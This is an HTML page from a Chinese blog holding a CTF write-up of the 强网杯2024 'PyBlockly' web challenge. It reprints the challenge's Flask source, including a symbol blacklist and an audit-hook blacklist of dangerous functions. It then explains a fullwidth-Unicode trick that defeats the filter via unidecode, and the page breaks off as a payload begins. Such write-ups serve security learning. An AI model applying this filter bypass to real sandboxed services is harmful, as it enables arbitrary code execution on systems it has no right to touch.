
  <!DOCTYPE html>
  <html lang="zh-CN"  >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    强网杯2024复现 |
    
    KL
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="太难了，都看不懂 [TOC]  Web  PyBlockly 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2024复现">
<meta property="og:url" content="https://fub0y2026.github.io/2025/10/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2024%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="KL">
<meta property="og:description" content="太难了，都看不懂 [TOC]  Web  PyBlockly 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-53-Db6jnYEx.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-52-CObtPZSa.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-57-DzfSq3UZ.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-55-Cl8-fg3f.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-56-CMmvbkBz.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/AuPpbLh5mobpgwx1jjRchMe6nld.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20241102125723325.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/b017e470-feda-4a53-96d2-90a7133a1505.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/cd60b7cd-e902-477d-ab12-d4fe477b4460.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/f1abf556-2db2-48f5-9881-8557a07d55a7.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/42945632-6661-4760-b130-3559fd11e990.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/a2e4f41f-7361-42a5-a884-4ad919838dc0.png">
<meta property="article:published_time" content="2025-10-16T11:59:08.000Z">
<meta property="article:modified_time" content="2025-12-09T13:45:47.893Z">
<meta property="article:author" content="FuB0Y">
<meta property="article:tag" content="比赛复现">
<meta property="article:tag" content="Python的.pth文件机制">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fub0y2026.github.io/images/image-53-Db6jnYEx.png">
  
  
    <link rel="alternate" href="/atom.xml" title="KL" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.css">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    <picture>
      
    </picture>
    
      <img fetchpriority="high" src="/images/banner.webp" alt="强网杯2024复现">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">强网杯2024复现</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text"> Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pyblockly"><span class="toc-number">1.1.</span> <span class="toc-text"> PyBlockly</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%B8%80-python-%E7%9A%84-pth-%E6%96%87%E4%BB%B6%E6%9C%BA%E5%88%B6"><span class="toc-number">1.1.1.</span> <span class="toc-text"> 法一 Python 的 .pth 文件机制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-number">1.1.1.1.</span> <span class="toc-text"> 知识点</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">1.1.1.2.</span> <span class="toc-text"> 解题</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%BA%8C-%E9%97%AD%E5%90%88%E9%80%83%E9%80%B8%E8%A6%86%E7%9B%96len"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 法二 闭合逃逸+覆盖len</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#snake"><span class="toc-number">1.2.</span> <span class="toc-text"> snake</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">396</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">327</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-强网杯2024复现" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/10/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2024%E5%A4%8D%E7%8E%B0/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-10-16T11:59:08.000Z" itemprop="datePublished">2025-10-16</time>
    <time style="display: none;" id="post-update-time">2025-12-09</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/" data-aos="zoom-in">比赛复现</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <p>太难了，都看不懂</p>
<p>[TOC]</p>
<h2 id="web"><a class="markdownIt-Anchor" href="#web"></a> Web</h2>
<h3 id="pyblockly"><a class="markdownIt-Anchor" href="#pyblockly"></a> PyBlockly</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, jsonify</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> unidecode</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> ast</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> importlib.util</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">&#x27;JSON_AS_ASCII&#x27;</span>] = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">blacklist_pattern = <span class="string">r&quot;[!\&quot;$%&amp;&#x27;()*+,-./:;&lt;=&gt;?@[\\\]^_`&#123;|&#125;~]&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">module_exists</span>(<span class="params">module_name</span>):</span><br><span class="line">    spec = importlib.util.find_spec(module_name)</span><br><span class="line">    <span class="keyword">if</span> spec <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> module_name <span class="keyword">in</span> sys.builtin_module_names:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> spec.origin:</span><br><span class="line">        std_lib_path = os.path.dirname(os.__file__)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> spec.origin.startswith(std_lib_path) <span class="keyword">and</span> <span class="keyword">not</span> spec.origin.startswith(os.getcwd()):</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">verify_secure</span>(<span class="params">m</span>):</span><br><span class="line">    <span class="comment">#for node in ast.walk(m):</span></span><br><span class="line">       <span class="comment"># match type(node):</span></span><br><span class="line">            <span class="comment">#case ast.Import:</span></span><br><span class="line">                <span class="comment">#print(&quot;ERROR: Banned module &quot;)</span></span><br><span class="line">                <span class="comment">#return False</span></span><br><span class="line">            <span class="comment">#case ast.ImportFrom:</span></span><br><span class="line">                <span class="comment">#print(f&quot;ERROR: Banned module &#123;node.module&#125;&quot;)</span></span><br><span class="line">                <span class="comment">#return False</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check_for_blacklisted_symbols</span>(<span class="params">input_text</span>):</span><br><span class="line">    <span class="keyword">if</span> re.search(blacklist_pattern, input_text):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">block_to_python</span>(<span class="params">block</span>):</span><br><span class="line">    block_type = block[<span class="string">&#x27;type&#x27;</span>]</span><br><span class="line">    code = <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> block_type == <span class="string">&#x27;print&#x27;</span>:</span><br><span class="line">        text_block = block[<span class="string">&#x27;inputs&#x27;</span>][<span class="string">&#x27;TEXT&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line">        text = block_to_python(text_block)</span><br><span class="line">        code = <span class="string">f&quot;print(<span class="subst">&#123;text&#125;</span>)&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">elif</span> block_type == <span class="string">&#x27;math_number&#x27;</span>:</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">str</span>(block[<span class="string">&#x27;fields&#x27;</span>][<span class="string">&#x27;NUM&#x27;</span>]).isdigit():</span><br><span class="line">            code = <span class="built_in">int</span>(block[<span class="string">&#x27;fields&#x27;</span>][<span class="string">&#x27;NUM&#x27;</span>])</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            code = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">elif</span> block_type == <span class="string">&#x27;text&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> check_for_blacklisted_symbols(block[<span class="string">&#x27;fields&#x27;</span>][<span class="string">&#x27;TEXT&#x27;</span>]):</span><br><span class="line">            code = <span class="string">&#x27;&#x27;</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">            code = <span class="string">&quot;&#x27;&quot;</span> + unidecode.unidecode(block[<span class="string">&#x27;fields&#x27;</span>][<span class="string">&#x27;TEXT&#x27;</span>]) + <span class="string">&quot;&#x27;&quot;</span></span><br><span class="line">    <span class="keyword">elif</span> block_type == <span class="string">&#x27;max&#x27;</span>:</span><br><span class="line"></span><br><span class="line">        a_block = block[<span class="string">&#x27;inputs&#x27;</span>][<span class="string">&#x27;A&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line">        b_block = block[<span class="string">&#x27;inputs&#x27;</span>][<span class="string">&#x27;B&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line">        a = block_to_python(a_block)</span><br><span class="line">        b = block_to_python(b_block)</span><br><span class="line">        code = <span class="string">f&quot;max(<span class="subst">&#123;a&#125;</span>, <span class="subst">&#123;b&#125;</span>)&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">elif</span> block_type == <span class="string">&#x27;min&#x27;</span>:</span><br><span class="line">        a_block = block[<span class="string">&#x27;inputs&#x27;</span>][<span class="string">&#x27;A&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line">        b_block = block[<span class="string">&#x27;inputs&#x27;</span>][<span class="string">&#x27;B&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line">        a = block_to_python(a_block)</span><br><span class="line">        b = block_to_python(b_block)</span><br><span class="line">        code = <span class="string">f&quot;min(<span class="subst">&#123;a&#125;</span>, <span class="subst">&#123;b&#125;</span>)&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;next&#x27;</span> <span class="keyword">in</span> block:</span><br><span class="line"></span><br><span class="line">        block = block[<span class="string">&#x27;next&#x27;</span>][<span class="string">&#x27;block&#x27;</span>]</span><br><span class="line"></span><br><span class="line">        code += <span class="string">&quot;\n&quot;</span> + block_to_python(block) + <span class="string">&quot;\n&quot;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> code</span><br><span class="line">    <span class="keyword">return</span> code</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">json_to_python</span>(<span class="params">blockly_data</span>):</span><br><span class="line">    block = blockly_data[<span class="string">&#x27;blocks&#x27;</span>][<span class="string">&#x27;blocks&#x27;</span>][<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    python_code = <span class="string">&quot;&quot;</span></span><br><span class="line">    python_code += block_to_python(block) + <span class="string">&quot;\n&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> python_code</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">do</span>(<span class="params">source_code</span>):</span><br><span class="line">    hook_code = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">def my_audit_hook(event_name, arg):</span></span><br><span class="line"><span class="string">    blacklist = [&quot;popen&quot;, &quot;input&quot;, &quot;eval&quot;, &quot;exec&quot;, &quot;compile&quot;, &quot;memoryview&quot;]</span></span><br><span class="line"><span class="string">    if len(event_name) &gt; 4:</span></span><br><span class="line"><span class="string">        raise RuntimeError(&quot;Too Long!&quot;)</span></span><br><span class="line"><span class="string">    for bad in blacklist:</span></span><br><span class="line"><span class="string">        if bad in event_name:</span></span><br><span class="line"><span class="string">            raise RuntimeError(&quot;No!&quot;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">__import__(&#x27;sys&#x27;).addaudithook(my_audit_hook)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="built_in">print</span>(source_code)</span><br><span class="line">    code = hook_code + source_code</span><br><span class="line">    tree = <span class="built_in">compile</span>(source_code, <span class="string">&quot;run.py&quot;</span>, <span class="string">&#x27;exec&#x27;</span>, flags=ast.PyCF_ONLY_AST)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> verify_secure(tree):</span><br><span class="line">            <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;run.py&quot;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">                f.write(code)</span><br><span class="line">            result = subprocess.run([<span class="string">&#x27;python&#x27;</span>, <span class="string">&#x27;run.py&#x27;</span>], stdout=subprocess.PIPE, timeout=<span class="number">5</span>).stdout.decode(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line">            <span class="comment">#os.remove(&#x27;run.py&#x27;)</span></span><br><span class="line">            <span class="keyword">return</span> result</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;Execution aborted due to security concerns.&quot;</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        os.remove(<span class="string">&#x27;run.py&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Timeout!&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> app.send_static_file(<span class="string">&#x27;1.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/blockly_json&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">blockly_json</span>():</span><br><span class="line">    blockly_data = request.get_data()</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">type</span>(blockly_data))</span><br><span class="line">    blockly_data = json.loads(blockly_data.decode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">    <span class="built_in">print</span>(blockly_data)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        python_code = json_to_python(blockly_data)</span><br><span class="line">        <span class="keyword">return</span> do(python_code)</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;error&quot;</span>: <span class="string">&quot;Error generating Python code&quot;</span>, <span class="string">&quot;details&quot;</span>: <span class="built_in">str</span>(e)&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>首先对源码进行审计，发现功能很简单，就是自定义写个code然后拼接</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">def my_audit_hook(event_name, arg):</span></span><br><span class="line"><span class="string">    blacklist = [&quot;popen&quot;, &quot;input&quot;, &quot;eval&quot;, &quot;exec&quot;, &quot;compile&quot;, &quot;memoryview&quot;]</span></span><br><span class="line"><span class="string">    if len(event_name) &gt; 4:</span></span><br><span class="line"><span class="string">        raise RuntimeError(&quot;Too Long!&quot;)</span></span><br><span class="line"><span class="string">    for bad in blacklist:</span></span><br><span class="line"><span class="string">        if bad in event_name:</span></span><br><span class="line"><span class="string">            raise RuntimeError(&quot;No!&quot;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">__import__(&#x27;sys&#x27;).addaudithook(my_audit_hook)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>
<p>写到run.py里面运行，这里text的写入存在waf，基本过滤了所有符号</p>
<p>但是我们可以看到写入的text会经过unidecode，所以可以利用unicode欺骗来绕过waf</p>
<p>unidecode函数，能够将 Unicode 字符转换为<strong>最相似的 ASCII 字符</strong></p>
<p>可以用全角字符绕过</p>
<p>例如传入</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;blocks&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">      <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;text&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;fields&quot;</span><span class="punctuation">:</span> <span 